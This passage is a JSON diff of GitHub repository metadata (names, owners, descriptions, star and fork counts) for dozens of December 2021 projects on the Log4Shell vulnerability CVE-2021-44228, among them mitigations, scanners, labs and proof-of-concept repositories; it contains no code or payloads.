+ "created_at": "2021-12-12T13:28:31Z",
+ "updated_at": "2023-09-25T13:59:52Z",
+ "pushed_at": "2021-12-12T13:39:45Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437557116,
+ "name": "nginx-mitigate-log4shell",
+ "full_name": "infiniroot\/nginx-mitigate-log4shell",
+ "owner": {
+ "login": "infiniroot",
+ "id": 29702565,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29702565?v=4",
+ "html_url": "https:\/\/github.com\/infiniroot"
+ },
+ "html_url": "https:\/\/github.com\/infiniroot\/nginx-mitigate-log4shell",
+ "description": "Mitigate log4shell (CVE-2021-44228) vulnerability attacks using Nginx LUA script",
+ "fork": false,
+ "created_at": "2021-12-12T13:45:08Z",
+ "updated_at": "2024-05-10T08:52:50Z",
+ "pushed_at": "2021-12-15T08:14:56Z",
+ "stargazers_count": 38,
+ "watchers_count": 38,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4shell",
+ "lua",
+ "mitigation",
+ "nginx",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 38,
+ "score": 0,
+ "subscribers_count": 15
+ },
+ {
+ "id": 437560690,
+ "name": "log4j-cve-2021-44228",
+ "full_name": "lohanichaten\/log4j-cve-2021-44228",
+ "owner": {
+ "login": "lohanichaten",
+ "id": 70852336,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70852336?v=4",
+ "html_url": "https:\/\/github.com\/lohanichaten"
+ },
+ "html_url": "https:\/\/github.com\/lohanichaten\/log4j-cve-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-12T13:59:38Z",
+ "updated_at": "2021-12-12T14:03:46Z",
+ "pushed_at": "2021-12-12T14:03:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437562080,
+ "name": "log4j-log4shell-affected",
+ "full_name": "authomize\/log4j-log4shell-affected",
+ "owner": {
+ "login": "authomize",
+ "id": 57180096,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57180096?v=4",
+ "html_url": "https:\/\/github.com\/authomize"
+ },
+ "html_url": "https:\/\/github.com\/authomize\/log4j-log4shell-affected",
+ "description": "Lists of affected components and affected apps\/vendors by CVE-2021-44228 (aka Log4shell or Log4j RCE). This list is meant as a resource for security responders to be able to find and address the vulnerability ",
+ "fork": false,
+ "created_at": "2021-12-12T14:05:05Z",
+ "updated_at": "2023-03-08T09:40:40Z",
+ "pushed_at": "2021-12-19T07:40:25Z",
+ "stargazers_count": 53,
+ "watchers_count": 53,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j",
+ "log4j-rce"
+ ],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 53,
+ "score": 0,
+ "subscribers_count": 23
+ },
+ {
+ "id": 437567489,
+ "name": "CVE-2021-44228_IoCs",
+ "full_name": "guardicode\/CVE-2021-44228_IoCs",
+ "owner": {
+ "login": "guardicode",
+ "id": 64462782,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64462782?v=4",
+ "html_url": "https:\/\/github.com\/guardicode"
+ },
+ "html_url": "https:\/\/github.com\/guardicode\/CVE-2021-44228_IoCs",
+ "description": "Known IoCs for log4j framework vulnerability ",
+ "fork": false,
+ "created_at": "2021-12-12T14:27:28Z",
+ "updated_at": "2022-01-02T08:53:49Z",
+ "pushed_at": "2022-01-18T13:34:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 437574258,
+ "name": "log4j-poc",
+ "full_name": "fireflyingup\/log4j-poc",
+ "owner": {
+ "login": "fireflyingup",
+ "id": 48504204,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48504204?v=4",
+ "html_url": "https:\/\/github.com\/fireflyingup"
+ },
+ "html_url": "https:\/\/github.com\/fireflyingup\/log4j-poc",
+ "description": "CVE-2021-44228 test demo",
+ "fork": false,
+ "created_at": "2021-12-12T14:54:25Z",
+ "updated_at": "2021-12-13T05:10:53Z",
+ "pushed_at": "2021-12-13T05:10:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437575607,
+ "name": "cve-2021-44228-qingteng-patch",
+ "full_name": "qingtengyun\/cve-2021-44228-qingteng-patch",
+ "owner": {
+ "login": "qingtengyun",
+ "id": 18526503,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18526503?v=4",
+ "html_url": "https:\/\/github.com\/qingtengyun"
+ },
+ "html_url": "https:\/\/github.com\/qingtengyun\/cve-2021-44228-qingteng-patch",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-12T15:00:04Z",
+ "updated_at": "2023-01-10T03:23:19Z",
+ "pushed_at": "2021-12-12T16:03:21Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437582859,
+ "name": "log4j-jndi-be-gone",
+ "full_name": "nccgroup\/log4j-jndi-be-gone",
+ "owner": {
+ "login": "nccgroup",
+ "id": 4067082,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4067082?v=4",
+ "html_url": "https:\/\/github.com\/nccgroup"
+ },
+ "html_url": "https:\/\/github.com\/nccgroup\/log4j-jndi-be-gone",
+ "description": "A Byte Buddy Java agent-based fix for CVE-2021-44228, the log4j 2.x \"JNDI LDAP\" vulnerability.",
+ "fork": false,
+ "created_at": "2021-12-12T15:29:20Z",
+ "updated_at": "2023-11-03T08:18:38Z",
+ "pushed_at": "2022-01-04T02:03:58Z",
+ "stargazers_count": 71,
+ "watchers_count": 71,
+ "has_discussions": false,
+ "forks_count": 17,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 17,
+ "watchers": 71,
+ "score": 0,
+ "subscribers_count": 12
+ },
+ {
+ "id": 437583301,
+ "name": "cve-2021-44228-qingteng-online-patch",
+ "full_name": "qingtengyun\/cve-2021-44228-qingteng-online-patch",
+ "owner": {
+ "login": "qingtengyun",
+ "id": 18526503,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18526503?v=4",
+ "html_url": "https:\/\/github.com\/qingtengyun"
+ },
+ "html_url": "https:\/\/github.com\/qingtengyun\/cve-2021-44228-qingteng-online-patch",
+ "description": "Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.",
+ "fork": false,
+ "created_at": "2021-12-12T15:30:55Z",
+ "updated_at": "2022-11-09T18:14:43Z",
+ "pushed_at": "2022-01-19T09:07:14Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "log4j",
+ "log4jshell"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437586734,
+ "name": "horrors-log4shell",
+ "full_name": "tasooshi\/horrors-log4shell",
+ "owner": {
+ "login": "tasooshi",
+ "id": 44586478,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44586478?v=4",
+ "html_url": "https:\/\/github.com\/tasooshi"
+ },
+ "html_url": "https:\/\/github.com\/tasooshi\/horrors-log4shell",
+ "description": "A micro lab for CVE-2021-44228 (log4j)",
+ "fork": false,
+ "created_at": "2021-12-12T15:44:49Z",
+ "updated_at": "2022-03-15T19:14:39Z",
+ "pushed_at": "2022-02-22T00:27:58Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j",
+ "log4shell"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437602257,
+ "name": "evil-rmi-server",
+ "full_name": "Hydragyrum\/evil-rmi-server",
+ "owner": {
+ "login": "Hydragyrum",
+ "id": 4928181,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4928181?v=4",
+ "html_url": "https:\/\/github.com\/Hydragyrum"
+ },
+ "html_url": "https:\/\/github.com\/Hydragyrum\/evil-rmi-server",
+ "description": "An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-12T16:49:45Z",
+ "updated_at": "2024-03-18T15:32:27Z",
+ "pushed_at": "2021-12-12T21:48:06Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437603411,
+ "name": "spring-boot-log4j-cve-2021-44228-docker-lab",
+ "full_name": "twseptian\/spring-boot-log4j-cve-2021-44228-docker-lab",
+ "owner": {
+ "login": "twseptian",
+ "id": 9025301,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9025301?v=4",
+ "html_url": "https:\/\/github.com\/twseptian"
+ },
+ "html_url": "https:\/\/github.com\/twseptian\/spring-boot-log4j-cve-2021-44228-docker-lab",
+ "description": "Spring Boot Log4j - CVE-2021-44228 Docker Lab ",
+ "fork": false,
+ "created_at": "2021-12-12T16:54:33Z",
+ "updated_at": "2024-05-09T06:46:00Z",
+ "pushed_at": "2021-12-17T13:59:44Z",
+ "stargazers_count": 24,
+ "watchers_count": 24,
+ "has_discussions": false,
+ "forks_count": 21,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j",
+ "spring-boot-log4j"
+ ],
+ "visibility": "public",
+ "forks": 21,
+ "watchers": 24,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437630669,
+ "name": "log4jcheck",
+ "full_name": "OlafHaalstra\/log4jcheck",
+ "owner": {
+ "login": "OlafHaalstra",
+ "id": 6420723,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6420723?v=4",
+ "html_url": "https:\/\/github.com\/OlafHaalstra"
+ },
+ "html_url": "https:\/\/github.com\/OlafHaalstra\/log4jcheck",
+ "description": "Check list of URLs against Log4j vulnerability CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-12T18:57:05Z",
+ "updated_at": "2023-06-25T13:56:28Z",
+ "pushed_at": "2021-12-20T17:32:06Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437649883,
+ "name": "Prove-CVE-2021-44228",
+ "full_name": "Panyaprach\/Prove-CVE-2021-44228",
+ "owner": {
+ "login": "Panyaprach",
+ "id": 9110880,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9110880?v=4",
+ "html_url": "https:\/\/github.com\/Panyaprach"
+ },
+ "html_url": "https:\/\/github.com\/Panyaprach\/Prove-CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-12T20:31:19Z",
+ "updated_at": "2024-04-28T19:39:24Z",
+ "pushed_at": "2022-01-14T10:08:06Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437660117,
+ "name": "Log4j-RCE",
+ "full_name": "momos1337\/Log4j-RCE",
+ "owner": {
+ "login": "momos1337",
+ "id": 64172550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64172550?v=4",
+ "html_url": "https:\/\/github.com\/momos1337"
+ },
+ "html_url": "https:\/\/github.com\/momos1337\/Log4j-RCE",
+ "description": "Log4j RCE - (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-12T21:26:44Z",
+ "updated_at": "2023-09-28T11:34:03Z",
+ "pushed_at": "2021-12-13T00:54:22Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bughunter",
+ "cve-2021-44228",
+ "exploit",
+ "hacking",
+ "log4j",
+ "log4j-rce",
+ "rce",
+ "remote-code-execution"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437660360,
+ "name": "cve-2021-44228-log4j-mitigation",
+ "full_name": "palominoinc\/cve-2021-44228-log4j-mitigation",
+ "owner": {
+ "login": "palominoinc",
+ "id": 7401270,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7401270?v=4",
+ "html_url": "https:\/\/github.com\/palominoinc"
+ },
+ "html_url": "https:\/\/github.com\/palominoinc\/cve-2021-44228-log4j-mitigation",
+ "description": "Mitigate against log4j vulnerability",
+ "fork": false,
+ "created_at": "2021-12-12T21:28:09Z",
+ "updated_at": "2021-12-16T15:15:07Z",
+ "pushed_at": "2021-12-16T15:15:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 437663314,
+ "name": "log4j-poc",
+ "full_name": "cyberxml\/log4j-poc",
+ "owner": {
+ "login": "cyberxml",
+ "id": 10391872,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10391872?v=4",
+ "html_url": "https:\/\/github.com\/cyberxml"
+ },
+ "html_url": "https:\/\/github.com\/cyberxml\/log4j-poc",
+ "description": "A Docker based LDAP RCE exploit demo for CVE-2021-44228 Log4Shell",
+ "fork": false,
+ "created_at": "2021-12-12T21:45:33Z",
+ "updated_at": "2024-02-22T17:18:06Z",
+ "pushed_at": "2022-12-21T21:11:58Z",
+ "stargazers_count": 70,
+ "watchers_count": 70,
+ "has_discussions": false,
+ "forks_count": 34,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "exploit",
+ "log4j",
+ "log4shell",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 34,
+ "watchers": 70,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 437664611,
+ "name": "Log4J-CVE-2021-44228-RCE",
+ "full_name": "corneacristian\/Log4J-CVE-2021-44228-RCE",
+ "owner": {
+ "login": "corneacristian",
+ "id": 59137279,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59137279?v=4",
+ "html_url": "https:\/\/github.com\/corneacristian"
+ },
+ "html_url": "https:\/\/github.com\/corneacristian\/Log4J-CVE-2021-44228-RCE",
+ "description": "Log4J (CVE-2021-44228) Exploit with Remote Command Execution (RCE)",
+ "fork": false,
+ "created_at": "2021-12-12T21:52:53Z",
+ "updated_at": "2023-07-20T04:33:57Z",
+ "pushed_at": "2021-12-12T22:36:02Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437674455,
+ "name": "nse-log4shell",
+ "full_name": "Diverto\/nse-log4shell",
+ "owner": {
+ "login": "Diverto",
+ "id": 11384089,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11384089?v=4",
+ "html_url": "https:\/\/github.com\/Diverto"
+ },
+ "html_url": "https:\/\/github.com\/Diverto\/nse-log4shell",
+ "description": "Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-12T22:52:02Z",
+ "updated_at": "2024-05-30T16:27:51Z",
+ "pushed_at": "2021-12-20T15:34:21Z",
+ "stargazers_count": 349,
+ "watchers_count": 349,
+ "has_discussions": false,
+ "forks_count": 49,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 49,
+ "watchers": 349,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 437674999,
+ "name": "log4py",
+ "full_name": "dotPY-hax\/log4py",
+ "owner": {
+ "login": "dotPY-hax",
+ "id": 67259802,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67259802?v=4",
+ "html_url": "https:\/\/github.com\/dotPY-hax"
+ },
+ "html_url": "https:\/\/github.com\/dotPY-hax\/log4py",
+ "description": "pythonic pure python RCE exploit for CVE-2021-44228 log4shell",
+ "fork": false,
+ "created_at": "2021-12-12T22:55:25Z",
+ "updated_at": "2022-11-09T18:14:43Z",
+ "pushed_at": "2021-12-12T23:49:01Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "exploit",
+ "log4j",
+ "python",
+ "pythonic",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437681598,
+ "name": "CVE-2021-44228-PoC",
+ "full_name": "sunnyvale-it\/CVE-2021-44228-PoC",
+ "owner": {
+ "login": "sunnyvale-it",
+ "id": 44291039,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291039?v=4",
+ "html_url": "https:\/\/github.com\/sunnyvale-it"
+ },
+ "html_url": "https:\/\/github.com\/sunnyvale-it\/CVE-2021-44228-PoC",
+ "description": "CVE-2021-44228 (Log4Shell) Proof of Concept",
+ "fork": false,
+ "created_at": "2021-12-12T23:37:39Z",
+ "updated_at": "2023-02-01T08:33:19Z",
+ "pushed_at": "2021-12-13T21:23:25Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cybersecurity",
+ "java",
+ "log4j",
+ "log4j2",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 437685288,
+ "name": "log4j2-CVE-2021-44228",
+ "full_name": "maxant\/log4j2-CVE-2021-44228",
+ "owner": {
+ "login": "maxant",
+ "id": 1108507,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1108507?v=4",
+ "html_url": "https:\/\/github.com\/maxant"
+ },
+ "html_url": "https:\/\/github.com\/maxant\/log4j2-CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-13T00:02:54Z",
+ "updated_at": "2021-12-19T19:56:12Z",
+ "pushed_at": "2021-12-19T19:56:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437687048,
+ "name": "fail2ban-log4j",
+ "full_name": "atnetws\/fail2ban-log4j",
+ "owner": {
+ "login": "atnetws",
+ "id": 44603839,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44603839?v=4",
+ "html_url": "https:\/\/github.com\/atnetws"
+ },
+ "html_url": "https:\/\/github.com\/atnetws\/fail2ban-log4j",
+ "description": "fail2ban filter that catches attacks againts log4j CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T00:14:31Z",
+ "updated_at": "2022-07-21T09:23:18Z",
+ "pushed_at": "2022-01-06T20:00:17Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437687082,
+ "name": "cve-2021-44228",
+ "full_name": "kimobu\/cve-2021-44228",
+ "owner": {
+ "login": "kimobu",
+ "id": 18669130,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18669130?v=4",
+ "html_url": "https:\/\/github.com\/kimobu"
+ },
+ "html_url": "https:\/\/github.com\/kimobu\/cve-2021-44228",
+ "description": "Some files for red team\/blue team investigations into CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T00:14:45Z",
+ "updated_at": "2023-08-15T12:50:48Z",
+ "pushed_at": "2021-12-14T19:46:02Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437688500,
+ "name": "anti-jndi",
+ "full_name": "KainsRache\/anti-jndi",
+ "owner": {
+ "login": "KainsRache",
+ "id": 1352675,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1352675?v=4",
+ "html_url": "https:\/\/github.com\/KainsRache"
+ },
+ "html_url": "https:\/\/github.com\/KainsRache\/anti-jndi",
+ "description": "Fun things against the abuse of the recent CVE-2021-44228 (Log4Shell) vulnerability using common web servers.",
+ "fork": false,
+ "created_at": "2021-12-13T00:23:20Z",
+ "updated_at": "2021-12-13T22:21:20Z",
+ "pushed_at": "2021-12-13T22:21:17Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437704633,
+ "name": "Log4j-check",
+ "full_name": "bigsizeme\/Log4j-check",
+ "owner": {
+ "login": "bigsizeme",
+ "id": 17845094,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17845094?v=4",
+ "html_url": "https:\/\/github.com\/bigsizeme"
+ },
+ "html_url": "https:\/\/github.com\/bigsizeme\/Log4j-check",
+ "description": "log4J burp被扫插件、CVE-2021-44228、支持dnclog.cn和burp内置DNS、可配合JNDIExploit生成payload",
+ "fork": false,
+ "created_at": "2021-12-13T01:55:51Z",
+ "updated_at": "2024-06-26T04:23:19Z",
+ "pushed_at": "2021-12-13T09:18:19Z",
+ "stargazers_count": 63,
+ "watchers_count": 63,
+ "has_discussions": false,
+ "forks_count": 19,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 19,
+ "watchers": 63,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437709337,
+ "name": "exploit-CVE-2021-44228",
+ "full_name": "pedrohavay\/exploit-CVE-2021-44228",
+ "owner": {
+ "login": "pedrohavay",
+ "id": 18234370,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18234370?v=4",
+ "html_url": "https:\/\/github.com\/pedrohavay"
+ },
+ "html_url": "https:\/\/github.com\/pedrohavay\/exploit-CVE-2021-44228",
+ "description": "This is a proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228).",
+ "fork": false,
+ "created_at": "2021-12-13T02:18:57Z",
+ "updated_at": "2024-01-30T05:00:44Z",
+ "pushed_at": "2021-12-13T16:35:58Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437721429,
+ "name": "log4j-nullroute",
+ "full_name": "0xRyan\/log4j-nullroute",
+ "owner": {
+ "login": "0xRyan",
+ "id": 87556614,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87556614?v=4",
+ "html_url": "https:\/\/github.com\/0xRyan"
+ },
+ "html_url": "https:\/\/github.com\/0xRyan\/log4j-nullroute",
+ "description": "Ingest GreyNoise.io malicious feed for CVE-2021-44228 and apply null routes",
+ "fork": false,
+ "created_at": "2021-12-13T03:15:42Z",
+ "updated_at": "2023-09-28T11:34:03Z",
+ "pushed_at": "2021-12-14T23:03:03Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437729534,
+ "name": "CVE-2021-44228",
+ "full_name": "fireeye\/CVE-2021-44228",
+ "owner": {
+ "login": "fireeye",
+ "id": 4984788,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4984788?v=4",
+ "html_url": "https:\/\/github.com\/fireeye"
+ },
+ "html_url": "https:\/\/github.com\/fireeye\/CVE-2021-44228",
+ "description": "OpenIOC rules to facilitate hunting for indicators of compromise",
+ "fork": false,
+ "created_at": "2021-12-13T03:55:32Z",
+ "updated_at": "2022-07-22T10:52:24Z",
+ "pushed_at": "2022-01-07T14:25:33Z",
+ "stargazers_count": 37,
+ "watchers_count": 37,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 37,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 437729997,
+ "name": "log4j-scan",
+ "full_name": "fullhunt\/log4j-scan",
+ "owner": {
+ "login": "fullhunt",
+ "id": 34830403,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34830403?v=4",
+ "html_url": "https:\/\/github.com\/fullhunt"
+ },
+ "html_url": "https:\/\/github.com\/fullhunt\/log4j-scan",
+ "description": "A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 ",
+ "fork": false,
+ "created_at": "2021-12-13T03:57:50Z",
+ "updated_at": "2024-06-24T06:42:41Z",
+ "pushed_at": "2022-11-23T18:23:24Z",
+ "stargazers_count": 3375,
+ "watchers_count": 3375,
+ "has_discussions": true,
+ "forks_count": 740,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 740,
+ "watchers": 3375,
+ "score": 0,
+ "subscribers_count": 57
+ },
+ {
+ "id": 437733080,
+ "name": "log4j_checker_beta",
+ "full_name": "rubo77\/log4j_checker_beta",
+ "owner": {
+ "login": "rubo77",
+ "id": 1591563,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1591563?v=4",
+ "html_url": "https:\/\/github.com\/rubo77"
+ },
+ "html_url": "https:\/\/github.com\/rubo77\/log4j_checker_beta",
+ "description": "a fast check, if your server could be vulnerable to CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T04:14:18Z",
+ "updated_at": "2024-05-10T10:43:31Z",
+ "pushed_at": "2022-01-21T11:43:49Z",
+ "stargazers_count": 255,
+ "watchers_count": 255,
+ "has_discussions": true,
+ "forks_count": 90,
